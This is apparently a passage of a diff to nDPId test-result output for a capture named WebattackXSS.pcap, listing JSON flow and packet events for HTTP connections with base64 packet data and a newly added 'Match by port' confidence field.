-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347211522,"flow_last_seen":1499347216676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347334437,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54782,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347211522,"flow_last_seen":1499347216676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347334437,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54782,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347211522,"flow_last_seen":1499347216676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347334437,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54782,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347214088,"flow_last_seen":1499347219676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347334437,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54808,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347214088,"flow_last_seen":1499347219676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347334437,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54808,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347214088,"flow_last_seen":1499347219676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347334437,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3052,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347334667,"flow_last_seen":1499347334667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347334667,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3052,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1499347334667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347334667,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ruhAAD4GFuisEAABwKgKMtsaAFCxtOCmAAAAAKACchChtQAAAgQFtAQCCAoBOk5OAAAAAAEDAwc="}
@@ -1172,17 +1172,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1499347343672,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347343672,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83PZAAD4G6NmsEAABwKgKMtt6AFBC4YvvAAAAAKACchBcFQAAAgQFtAQCCAoBOlcZAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3128,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":2,"flow_last_seen":1499347343672,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347343672,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ23pctqnYQuGL8KAScSAp8gAAAgQFtAQCCAoD5CiPATpXGQEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":3,"flow_last_seen":1499347343673,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347343673,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03PdAAD4G6OCsEAABwKgKMtt6AFBC4YvwXLap2YAQAOXI+AAAAQEICgE6VxoD5CiP"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347219208,"flow_last_seen":1499347224678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347344684,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54862,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347219208,"flow_last_seen":1499347224678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347344684,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54862,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347219208,"flow_last_seen":1499347224678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347344684,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54862,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347220447,"flow_last_seen":1499347225677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347344684,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54876,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347220447,"flow_last_seen":1499347225677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347344684,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54876,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347220447,"flow_last_seen":1499347225677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347344684,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54876,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347221694,"flow_last_seen":1499347227677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347344684,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54890,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347221694,"flow_last_seen":1499347227677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347344684,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54890,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347221694,"flow_last_seen":1499347227677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347344684,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54890,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347224338,"flow_last_seen":1499347229678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347344684,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54916,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347224338,"flow_last_seen":1499347229678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347344684,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54916,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347224338,"flow_last_seen":1499347229678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347344684,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54916,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347215361,"flow_last_seen":1499347220676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347344684,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54822,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347215361,"flow_last_seen":1499347220676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347344684,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54822,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347215361,"flow_last_seen":1499347220676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347344684,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54822,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347216659,"flow_last_seen":1499347221677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347344684,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54836,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347216659,"flow_last_seen":1499347221677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347344684,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54836,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347216659,"flow_last_seen":1499347221677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347344684,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54836,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347346211,"flow_last_seen":1499347346211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347346211,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1499347346211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347346211,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZYhAAD4GYEisEAABwKgKMtuUAFCjBDwcAAAAAKACchBJMAAAAgQFtAQCCAoBOlmUAAAAAAEDAwc="}
@@ -1204,17 +1204,17 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1499347352698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347352698,"pkt":"ABm5CmnxAMGxFOsxCABFAAA894dAAD4GzkisEAABwKgKMtvYAFB9d6htAAAAAKACchD70QAAAgQFtAQCCAoBOl\/qAAAAAAEDAwc="}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3203,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":2,"flow_last_seen":1499347352699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347352699,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ29gsQT\/ffXeobqAScSBbTAAAAgQFtAQCCAoD5DFgATpf6gEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":3,"flow_last_seen":1499347352699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347352699,"pkt":"ABm5CmnxAMGxFOsxCABFAAA094hAAD4Gzk+sEAABwKgKMtvYAFB9d6huLEE\/4IAQAOX6UwAAAQEICgE6X+oD5DFg"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347225590,"flow_last_seen":1499347230679,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347354714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54930,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347225590,"flow_last_seen":1499347230679,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347354714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54930,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347225590,"flow_last_seen":1499347230679,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347354714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54930,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347229416,"flow_last_seen":1499347234681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347354714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54970,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347229416,"flow_last_seen":1499347234681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347354714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54970,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347229416,"flow_last_seen":1499347234681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347354714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54970,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347230690,"flow_last_seen":1499347236682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347354714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54984,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347230690,"flow_last_seen":1499347236682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347354714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54984,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347230690,"flow_last_seen":1499347236682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347354714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54984,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347233219,"flow_last_seen":1499347238682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347354714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55010,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347233219,"flow_last_seen":1499347238682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347354714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55010,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
